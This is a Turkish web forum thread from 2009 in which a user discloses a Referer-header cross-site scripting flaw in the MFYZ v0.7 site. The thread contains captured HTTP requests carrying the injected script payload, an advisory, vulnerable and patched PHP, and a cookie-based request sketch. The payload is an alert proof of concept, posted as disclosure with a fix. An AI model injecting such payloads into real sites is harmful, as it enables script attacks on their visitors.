Ãœye : depo2

3 Ocak Cumartesi ´09 13:04 tarihinde yazmış

Merhaba MFYZ askerdesin biliyorum ama bi ara mesajlaÅŸmıştık sonrada o mail ÅŸifremi kaybettiÄŸimden giremedim neyse gelelim XRS (XAS) açığın var gelince halledersin artık  

[ScreenShot]  
[img]http://img230.imageshack.us/img230/7421/41992580ls8.jpg[/img]

[ScreenShot]
[img]http://img378.imageshack.us/img378/2626/11554707si9.jpg[/img]

**************************************************************
http://mfyz.com/aksiyon.php?islem=aktivite

POST /aksiyon.php?islem=aktivite HTTP/1.1
Host: mfyz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: tr-TR,tr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-9,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: '"></title><script>alert(23)</script>><marquee><h1>XSS by Depo2</h1></marquee>
Cookie: __utma=231411651.208398704.1230706386.1230706386.1230706386.1; __utmz=231411651.1230706386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); mfyz_beni_hatirla_uno=74; mfyz_beni_hatirla_anahtari=[]; PHPSESSID=[]
Pragma: no-cache
Cache-Control: no-cache

HTTP/1.x 200 OK
Date: Sat, 03 Jan 2009 10:54:04 GMT
Server: Apache/1.3.41 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
----------------------------------------------------------
http://mfyz.com/?/iletisim/

GET /?/iletisim/ HTTP/1.1
Host: mfyz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-9,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: __utma=231411651.208398704.1230706386.1230706386.1230706386.1; __utmz=231411651.1230706386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); mfyz_beni_hatirla_uno=74; mfyz_beni_hatirla_anahtari=[]; PHPSESSID=[]
Referer: '"></title><script>alert(23)</script>><marquee><h1>XSS by Depo2</h1></marquee>

HTTP/1.x 200 OK
Date: Sat, 03 Jan 2009 10:54:05 GMT
Server: Apache/1.3.41 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

**************************************************************




Aç PeÅŸ Parsız Coderım Ä°ÅŸ Arıyorum bu arada script düzenlenir kodlanır kontrole dilir  

MFYZ abi eliizden tutmuyoki  

Ãœye : depo2

9 Ocak Cuma ´09 11:38 tarihinde yazmış

XRS Cross Referer Scripting in MFYZ v0.7

[Author]  Depo2.Nm.Ru
[Affected versions] version 0.7
[Class]  Input Validation Error
[Credit]  The disclosure of these issues has been credited to Depo2
[Original Advisory]    http://depo2.nm.ru/XRS_mfyzv0.7.txt
[ScreenShot]  http://img378.imageshack.us/img378/2626/11554707si9.jpg
[EXPLOIT] Attacker just change the referer by a 'malicious' code because much Webmaster dont know this vulnerability
[Solution]
Use a htmlentities() in your function for show the referer

Probable MFYZ v0.7 Script Referer Code
[Not Secure]
$referer = (!empty($_SERVER['HTTP_REFERER'])) ? $_SERVER['HTTP_REFERER'] : 'Unspecified';
echo "$referer";

[Secure]
$referer = (!empty($_SERVER['HTTP_REFERER'])) ? $_SERVER['HTTP_REFERER'] : 'Unspecified';
echo htmlspecialchars("$referer");

[Location]    http://mfyz.com/?/iletisim/  {Not Requrest Login}

Ãœye : depo2

14 Ocak ÇarÅŸamba ´09 03:06 tarihinde yazmış

XRS Cross Referer Scripting in MFYZ v0.7
• Date: 09/01/2009
• Product: MFYZ CMS
• Version: v0.7
• Vendor: www.mfyz.com
• Category: XSS
• Author: depo2

http://www.xssing.com/index.php?x=3&y=79

Ãœye : superselo

14 Ocak ÇarÅŸamba ´09 15:22 tarihinde yazmış

Madem boÅŸ vaktin çok var güvenlikle ilgili makaleler yazsana    eminim mfyz dökümanlar kısmında yayınlar.

Ãœye : depo2

14 Ocak ÇarÅŸamba ´09 18:40 tarihinde yazmış

Boş vakit varda pc başına oturdugumda kurcalıcagım hevesim yok canım sıkkın

Ãœye : superselo

18 Ocak Pazar ´09 21:04 tarihinde yazmış

ne diyo bunlar?

Ãœye : webmania

19 Ocak Pazartesi ´09 09:22 tarihinde yazmış

Bunlar neci oluyorlar.İşte önüne gelene yazma izni verirsen böle oluyor.Büyük ihtimal bu işi yapan tek kişidir.

Ãœye : webmania

19 Ocak Pazartesi ´09 11:41 tarihinde yazmış

sitedeki iletiÅŸim yazısındaki "L" harfi ile senin koyduÄŸun resimdeki "L" harfi birbirinden farklı dolayısıyla sitedeki açık olayı senin uydurman  

Ãœye : depo2

20 Ocak Salı ´09 01:26 tarihinde yazmış

Arkadaşım ÅŸuan bilÄŸi sınırını aşıyosun farkıdnamısın bu biraz terbiyesizliÄŸe giriyor hiç birÅŸey uydurmuyorum bak ÅŸimdi Åžu adresse gidiyorsun http://livehttpheaders.mozdev.org/ indiriyorsun sana header bilÄŸileirni veren basit bir firefox eklentisi , yükledikten sonra Firefox>Araçlar>Live HTTP headers'a tıklıyorsun  sonra http://mfyz.com/?/iletisim/ sayfasına giriÅŸ yapıyorsun ve karşına sana sayfaya gönderilen giden verileri gösteren bir bilÄŸilendirme logu geliyor.

Aşağıdaki gibi
 ************************************************
GET /?/iletisim/ HTTP/1.1
Host: mfyz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-9,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://mfyz.com/?/konu/252/Bug-Report-XSSXRSXAS/
 ************************************************

Dikkat Ettiysen Referer değerinin karşısında şuanki sayfanın konumu yazıyor değilmi Burda Analştıkmı???

Şimdi Ben bu algılanan konum referans değerini değiştiyorum ve XRS alert kodumu koyuyorum Bu Referans Değişikliği yapılan yönteme Cross Referer Scripting DENİR. XRS dikat ettiysen sonu RS ile Bitiyor Referer Scripting bu açığı kullanabilmen için bir kaç basit küçük programa ihitiyacın var algılana referans değerini değiştirdiğimde çalışır.

Şuan için
http://mfyz.com/?/giris/
http://mfyz.com/?/iletisim/ sayfalarında bu açık var.

Ve benden özür dilemen gerekiyor webmania diye bi nickin var bilğili bi şahıs bellmiştim seni ve buna b0k atmak denir XRS öğrenmen için sana PDF dosyasınıda UPLOAD ediyorum kendi serverıma sırf sen indir ve öğren diye!

Al Makalenin içinden konuyu bulmazsan diye burayada yazıyorum...

**********************************************

                        Header for fun and profit
                          Cross Referer Scripting

Another way to execute malicious code, similar to the XAS, the Cross Referer
Scripting (XRS) use the header to execute a code in a site
The referer is used by much webmasters for tracking visitors.

It is for that which solutions exists for the webmaster don’t see from which site you
come
example: anonym.to

We just change the referer by a 'malicious' code, yep you can replace the referrer by
an html code (but we need Firefox for that)
much webmasters don’t know or forget this vulnerability

**********************************************

BILGI HER SILAHTAN USTUNDUR!!!

Ãœye : depo2

20 Ocak Salı ´09 01:27 tarihinde yazmış

Buda Login Sayfasındaki XRS görüntüsü

http://img244.imageshack.us/img244/6307/sasiu8.jpg

Ãœye : depo2

20 Ocak Salı ´09 01:32 tarihinde yazmış

Buda PDF 'in Okumanı incelmeni isterim Tüm CROSS sadlırıaları hakkında çok geniş bir Makale "EXPLORATiON iN THE CROSS TERRiTORY" .ok sağlam bir dökümandır inglizcen yetmese bile resimler ve grafiklerden anlıcaksın
Hostuma söz veridğim gibi upload ettim buyur.

PDF: http://www.tptlabs.com/exploration.pdf

Söz ağızdan cıkana kadar o senin Esirindir, çıktıktan sonra sen onun Esirisindir!!!!!!

Ãœye : webmania

20 Ocak Salı ´09 10:25 tarihinde yazmış

ben sadece iletişim sayfası üzerinde jpg dosyası oluşturulurken oynanma olduğunu söylüyorum.buda çelişkiye düşürüyor.resimdeki fontlarda üzerinde değişiklik yapılmış bir image dosyası olduğunun göstergesi.açık olmayan site olduğunu sanmıyorum.AMA bu olayDA bir çelişki var.mademki açık olduğunu iddia ediyorsun o halde bunu mfyz nin emailine yazarak ilgilenip düzeltmesini sağlayabilirdin.senin yaptığın olay burada millete söylemekle ikinci bir çelişki sebebi.Ayrıca konuşmalarımı terbiyesizlik olarak algılama ben sadece yaptığının yalnış olduğunu anlatmaya çalışıyorum....

Ãœye : depo2

20 Ocak Salı ´09 18:08 tarihinde yazmış

Hayır böyle bişe yok yanlış felan değil mfyz forumda MFYZ.Com Hakkındaki Konular diye bölüm açmış ve açıklamsına "Duyurular, hatalar, istekler, öneriler ve gelişim" yazmış doğal olarak bulduğum hatayı burda yayınlamaı istemiş mail'e göndermeme benim tercihim. Hiç mfyz.com'un sayfalarının kaynak koduna baktıysa orda şu tarz bi yazı oldugunu görceksin.
<!--

  Mehmet Fatih YILDIZ (2007)
  fatih-at-mfyz-dot-com
  http://www.mfyz.com
  __________________________
  
  100% EL YAPIMI KODLAMADIR!
  __________________________
  
  Indent problemlerini
  bildirirseniz sevinirim.
  
-->

Bende problemi bildiriyorum. Benim anlamdıgım gayette açıklama yaptıgım halde bana uydurman demen, Ben diyorum şurda referans değerlerini kontrol ettirmmesinden kaynaklanan bir açık var sen diyosun bu resim uydurma benim dediğim referans değerini kontrol ettirtirdiğini veya ettirtirmediğine baktınmı. Sana incelmen için Makale gönderdim içinde Bu açığın ne oldugunu nasıl bulunacagını anlatan görsel en alt düzeyde anlatım var .Halen anlmadıysan Türkçesini Yazim Makalenin ! yazılan kelimeler inglizce ama resimlerden 1 şuna şunu yazcan buna tıklıcan hepsi anlatılmış. Sen senin bilğinin bu konuda olmadıgını kabul etmeyip gönderdiğim bilğileri incelmiyorsun. Insan uyduruyorsun demeden önce bu adam ne demiş diye bi ararştırır ,dersin bunu anlamadım anlat anlatırız ama birine bilmediğin bi alanda bu tarz bi hittam gayet kabaca Harbiden üzüldüm Webmania diye nickin var nickin anlmaına göre bu adam bilğili diyordum daha önceki yorumlarından bu tarz bi hareket senden hiç beklemiyorum açıkçası

Ãœye : webmania

22 Ocak PerÅŸembe ´09 13:20 tarihinde yazmış

sen olayın farkında değilsin haala.ben sana hakaret etmedim.sadece bu konuların hassas olduğunu düşünüyorum.sitede açık olabilir bu gayet normal birşey. ama bu durumu dile getirip burda onca insanın önünde anlatman benim moralimi bozdu. ilk mesajındaki resim linkini incelesin herkez. ve sitedeki iletişim yazısıyla senin verdiğin iletişim yazısı arasındaki farka baksın.ben hacker değilim bu konular beni hiç ilgilendirmiyor.ama bu site bi arkadaş ortamıdır.ben sitede otorite bozukluğu olmasını istemiyorum.bu davranışını yalnış bulduğum için konunun üstünde durdum.yoksa mfyz gerekli müdahaleyi yapacaktır açık varsa. zaten siteye acayip biri dadandı saçma sapan mesajlar atıyor galiba siteyi aracı kullanıp arama motorlarında çıkmasını sağlamaya çalışıyor anlamadım hiç.

Ãœye : depo2

22 Ocak PerÅŸembe ´09 15:31 tarihinde yazmış

O bağlanan dediğin bot da olabilir kişide backlink kasıyor sitenin pagerank değerlerine göre bulan botlarda var zatende o Captcha Security sınıfını public userlara uygualrsın gider o sorun değil. Ben buldugum açıkları yayınlarım zaten bu kodudada düşünmem maillmi atsam cünkü türkiyede böyle öğrendim adam güvenlik firmasıdır açığı vardır var dersin seni kapıdan kovar mail atarsın salamaz ondan dolayı bana görede bu şekilde Insanın gözüne sokmak değil daha fazla kafasına vurmak değiminide kullansan ben buldugum açıkları söylerim. Hem otorite bozukluğu beni bağlamaz. Senin hitap tarzın baştan bozuk ya kardaşim sen açık bulmuşsun bunun ispatlamışsın ama ben anlamadım resimde uydurma diyosun. Oraya ayzdığım bilğilerin senin açından bi anlam ifade etmemiş olması bilmediğin bi alanda bu uydurma demeni gerektirmiyor.

Ãœye : webmania

23 Ocak Cuma ´09 01:34 tarihinde yazmış

yaa cidden yeter. sanki ben sitenin en bilgilisiyim dedim. benim birşey bildiğim flan yok kendi çapında çalışmalar yapan bir web programlama öğrencisiyim. kurslarına gidiyorum.seminerlerine katılıyorum araştırıyorum geliştirmeye çalışıyorum.kendi çabalarımca bişiler yapmaya çalışıyorum ufak çapta.ikidebir laf sokmaya çalışacağına bana bunun açıklamasını yap. resimdeki iletişim yazısının fontu ile sitedeki iletişim yazısının fontu niye farklı.bunu açıklasaydın ilk mesajında bu konu bukadar uzamıyacaktı.ikide bir bişi biliyorsun sanki diyip durma artık.madem bukadar bilgilisin sitelerde en çok bulunan açıklar diye bir konu aç içinede bunlardan nasıl korunulur diye bir döküman hazırlada herkeze faydalı olsun böylece hepimiz teşekkür edelim....

Ãœye : superselo

23 Ocak Cuma ´09 05:52 tarihinde yazmış

Bende tavsiye ettim aynısını ama yanaÅŸmıyor kendisi. Ayrıca "l" olayını bende merak ettim ÅŸimdi  

Ãœye : depo2

24 Ocak Cumartesi ´09 03:49 tarihinde yazmış

Tamam tamam yazcam dökümanda bende merak ettim şu "l" harfini , Benim browserda öyel görünüyor ama imageshack.us'a bir Ekran Görüntüsü yollasana Kare içine Al o dediğin yeri benim Çektiğim ekran görüntüsünüde yanyana koy ikisinide işaretle bende soruna cevap vermeye çalışım

Ãœye : webmania

24 Ocak Cumartesi ´09 09:35 tarihinde yazmış

bitek l harfi değil "i" , "ş" hepsi farklı mozilla kullanıyorsun farklı gözükme imkanı yok.

ben senin dediğini yaptım imageshack'e upload ettim.
http://img520.imageshack.us/img520/8109/iletisimjb0.jpg

nasıl yaptığını bilmiyorum. Ama sayfayı farklı kaydedip üzerinde oynamalar yapmış olabilirsin.kendi eklediğin csslerden dolayı fontlar farklı çıkmış olabilir. Artık bu konuya mesaj yazıpta siteyi boş şeylerle doldurmak taraftarı değilim.
MFYZ gelince icabına bakar bu olayın.Sana başarılar...

Ãœye : depo2

24 Ocak Cumartesi ´09 17:20 tarihinde yazmış

Arkadaşım Benim Kullanıdıgım Browser  Firefox 3.0.5 sen ne kullanıyosun bana Internet Explorer kullanıyomuÅŸsun gibi geldi çünkü bazı alanalar daha kalın.

Bu farklılık da TARAYICLARIN CSS DOSYALARINI FARKLI FARKLI okumasından kaynaklanıyor.

Şimdi bende yüklü olan

Opera 9.62
FireFox 3.0.5
Inernet Explorer 8.0.6001.18241 Beta2

Browser ile 3 görüntüyüde yan yana koyup anlatmaya çalışcam.

Bide Tüm Ekran Görüntüsü Gönderirimisin Kullandıgın Browser yok. gönderdiğin görüntüde ekranı çekmiş Sreen Capture programın !!!

3 Browserdada ekran görüntüsü aldım ve hiç biri senin browser'ın gibi yanlış CSS yorumlamadı. Senin Kullandıgın Browser her ne ise Diğer 3 üne göre Yanlış Yorumluyor!!!!

Bide KardeÅŸim Ya SORU SORUYON!!!
 YANIT ISTIYON!!!
 LAF ATIYON!!

 SONARDA BU SITEYI BOÅž YERE DOLDURMA TARFATRI DEĞİLÄ°M DIYON birak onu sitenin sahibi düşünsüm sen GEL sordugun soruya kaçma!

3 Browser'ında Görüntüsünü  Bir ARAYA Topladım
DAHADA anlamzsan anlmadıgın YERI Sor Anlatayım


 ---- BROWSR KARÅžILAÅžTIRMASI ----

http://img207.imageshack.us/img207/8346/asdsalp8.jpg

Ãœye : depo2

24 Ocak Cumartesi ´09 17:36 tarihinde yazmış

Şu "l" harfi messelesinde CSS içinde Fontlara baktıysan
 font-family: "Lucida Grande", "Trebuchet MS", Tahoma, Sans-Serif; yazıyor Bumfyz seçtiÄŸi font bu 3 browser bende böyle okuyor sende öyle okuyor OK  


http://img339.imageshack.us/img339/2353/49214626mh9.jpg

Ãœye : depo2

24 Ocak Cumartesi ´09 17:39 tarihinde yazmış

Pardon Opera ile FireFoxun yerini bi üsteki resimde yanlış yazmışsım buyur

http://img218.imageshack.us/img218/7844/25550356ei3.jpg

Ãœye : webmania

24 Ocak Cumartesi ´09 18:44 tarihinde yazmış

ben mozilla firefox kullanıcısıyım eklediğim resim mozilladan alınma ama dediğin üzere opera , ie6,ie7, hepsinde denedim . malesef sende bir çarpıklık var.merak eden arkadaşlar iletişim sayfasını açsınlar ve her tarayıcıda denesinler.hepsinde bendeki gibi çıkacaktır. kullanıln fontlar net aleminde kullanılan sabit fontlar değişmesi ,farklı çıkması mümkün değil.




konu kilitleme yokmu yaaa   ..

---------------------------------------------------------------------

Ãœye : depo2

24 Ocak Cumartesi ´09 20:08 tarihinde yazmış

DoÄŸrudur benim bilÄŸilsayarda Farklı Görünüyor arkadaşın Windows da seninki gibi cıkyor Windowsu deÄŸiÅŸtirmiÅŸ olabilirim ama Sadece "l" harfinin farklı cıkması çok garip  


konu kilit      ..
Â¥
---------------------------------------------------------------------

Ãœye : webmania

24 Ocak Cumartesi ´09 22:27 tarihinde yazmış

ewet haklıya haklı ben haksız çıktım.windows kullanıyorum iş yerinde evde bakmamıştım hiç evde ubuntu var ubuntuda bakınca fontlar değişti sendeki gibi çıktı.sırf bu iş yüzünden kurmadığım tarayıcı kalmadı.ama işin tohaf tarafı windowstada mozilla kullanıyorum ubuntudada zaten default tarayıcı mozilla windowsta başka çıkıyor,ubuntuda başka çok garip.kusra bakma..
ama açık konusunda düzgün bir açıklama yapmanı istiyorum bu açık niye olur nasıl giderilir. madem bildiğini söylüyorsun anlatta bizde aynı hatayı yapmayalım..

-------------------------------------------------------------------------

Ãœye : depo2

24 Ocak Cumartesi ´09 23:26 tarihinde yazmış

Tamam Cross Terorisi Hakkında Çok Geniş Bir Makale Yazcam Resimli Anlatım,çözümler,öneriler vs.

Ãœye : depo2

24 Ocak Cumartesi ´09 23:44 tarihinde yazmış

Yukardaki açıgı kapatmak için referans kontrol scritptindeki

$referans = (!empty($_SERVER['HTTP_REFERER'])) ? $_SERVER['HTTP_REFERER'] : 'Unspecified';
echo "$referans";

daki echo "$referans"; deÄŸerini

echo htmlspecialchars("$referer");

değiştirmeniz yeterli tabi bu referans agılımada değil echo ile ekrana basarkenki özell karakterleri filitreler

[&] yeni hali [&am]
[“] yeni hali [$quot]
[<] yeni hali [&lt]
[>] yeni hali [&gt]

ÅŸekline dönüştürür yani  

Ãœye : webmania

25 Ocak Pazar ´09 01:11 tarihinde yazmış

  iyide bu çok bilindik bir açık mfyz bunu nasıl atlamışki hayret.en dandik text editörlerde bile göz ardı edilmiyor.

< ?

function tag_kilit($metin)

{

        $donen = @urldecode($metin);

        $donen = @str_replace('>','&gt ;',$donen);

        $donen = @str_replace('<','&lt ;',$donen);

        $donen = @str_replace('&','&am ;',$donen);
        $donen = @str_replace('“','$quot ;',$donen);
        return $donen;

}

 echo tag_kilit($cekilen_degisken);
? >
Belki lazım olur diye bu şekilde kullanmak isteyen birileri olur..
Buda bi yöntem

o kısımlardan bir zarar gelmiceği için belki umursamamış olabilir.ama log kullanan kişi için tehlikeli bir durum.
acaba başka inputlardada varmı serbest dolaşım hakkı neyse gelince halleder bunları

Ãœye : webmania

25 Ocak Pazar ´09 01:15 tarihinde yazmış

iyide referans koduyla text inputlarının ne alakası var yoksa ben hala olayı anlamadımmı. :S

Ãœye : depo2

25 Ocak Pazar ´09 01:28 tarihinde yazmış

Ya referans deÄŸerini kontrol etiriyor postların baÅŸka adresten gelip gelmediÄŸi için sanırımi  - action method post bi form göndercek yada baÅŸka bir kod bunu aynı sayfa üzerinden gelip gelmediÄŸini yada bundan önceki konumu kontrol etirmek içinde kullanabilir ama ben orda tahmini echo "$referans"; deÄŸeri diye söyledim kodları görememki ben sadece referans deÄŸerini deÄŸiÅŸtirerek kontrol etirip etirmediÄŸini anlayabilyorum    Müecim deÄŸilim tahminen bu koddur dedim ama Açığın Adı XRS Cross Referer Scripting    

Ãœye : webmania

25 Ocak Pazar ´09 12:46 tarihinde yazmış

hmm doğrudur... peki bi zararlı şahıs bu açıktan ne yapabilirki.sanki bişi yapamaz gibi geldi.çünki birşeyler kaydedemiyor.mysql ile bağlantısı flanda yok.

Ãœye : superselo

25 Ocak Pazar ´09 14:15 tarihinde yazmış

"Tamam Cross Terorisi Hakkında Çok Geniş Bir Makale Yazcam Resimli Anlatım,çözümler,öneriler vs."
En kısa zamanda bekliyoruz depo2  

Ãœye : depo2

25 Ocak Pazar ´09 14:32 tarihinde yazmış

Fazla biÅŸe yapılmaz doÄŸru ama Cookie düzenlenip yapılabilcek ÅŸeyler var daha doÄŸrusu kullanım amacına göre deÄŸiÅŸebilir    Exploit ÖrneÄŸin

mfyz_beni_hatirla_uno=1 Cookie deÄŸerim
mfyz_beni_hatirla_anahtari=[md5]

GET /aksiyon.php?&kadi=mfyz&sifre=******* HTTP/1.1
Host:
User-Agent: Lynx (textmode)
Cookie:
Connection: close vs vs...

Mfyz daha önce demiÅŸti cookie deÄŸri biÅŸe içermiyor ama açık açıktır    Bulması bizden düzeltmesi mfyz den  

Ãœye : webmania

26 Ocak Pazartesi ´09 00:21 tarihinde yazmış

doğru mfyz nin cookie değerleri şifreli bir kaç bilgi içeriyor mfyz 6.0 da biraz baktım kadi ve şifre yok yani mfyz dikkatlidir ama php geniş bir dil illa unutabiliyor bazı şeyleri insan ayrıca php bilen php ile ilgili herşeyi bilemeyebilir zamanla eksikliklerini düzeltir.mfyz iyi biliyor daha doğrusu tecrübesi var.
Süperselo bence bu sitenin sorularla beraber bol bereket dökümanlarda içermesi lazım.bu siteyi destekleyen arkadaÅŸların ufak tefek geliÅŸtirdiÄŸi uygulamaları dağıtıp açıklaması lazım böylece hem mfyz ye hemde türk programcılığına katkı olmuÅŸ olur.çünki bu sitede takılanların büyük kısmı kendini aÅŸmış insanlar.ben o gruptan deÄŸilim henüz    ama html ve php de elimden geldiÄŸince döküman hazırlamak istiyorum.kullanmadığım halde denk geldi baktımda internet explorer de bu site çok kötü çıkıyor.png ve mozilla çalışması olduÄŸu için sanırım.png sorunu çözülebilirde mfyz nin yeni bir tema düzenleyip tüm tarayıcılarda uyum içinde yapması lazım bence.

Ãœye : depo2

26 Ocak Pazartesi ´09 00:45 tarihinde yazmış

Browserların frklı css yorumlamalarından dolayı oluÅŸuyor ama bunlar için CSS Fix'ler var  

http://snipplr.com/popular/language/css/tags/fix/

Burda sadece bir kısmı var tabi.Ama bana göre bir tasarımcının en büyük sorunu bu Browserların css yorumalam farkı  

Ziyaretçi : deneme

22 Mart Pazar ´09 02:07 tarihinde yazmış

deneme@deneme.com

Ziyaretçi : Tolgahan Gurbetoğlu

22 Ekim Cuma ´10 01:56 tarihinde yazmış

depo2 sıfatlı arkadaşım öncelikle bildirme nezaketini kesinlikle destekliyorum.

webmania kardeşim sana gelince ; sen bu olaya karışamazsın.Yanlış yada doğru,yalan yada gerçek hiç farketmez.Bu web sitesinin bir yöneticisi var mı ? Evet var.
Mfyz gelir okur bakar ilgilenir,sorun halledilir,sonuç bildirilir.

sen kalkıpta aa bu resimde bi gariplik var sen yalancısın gibi manalı şeklinde konuşma hakkına sahip değilsin.

Lütfen meseleyi uzatma.MFYZ İlgilenecekti.